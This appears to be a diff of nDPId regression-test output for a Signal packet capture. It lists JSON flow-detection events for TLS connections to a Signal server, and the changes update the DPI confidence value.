{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
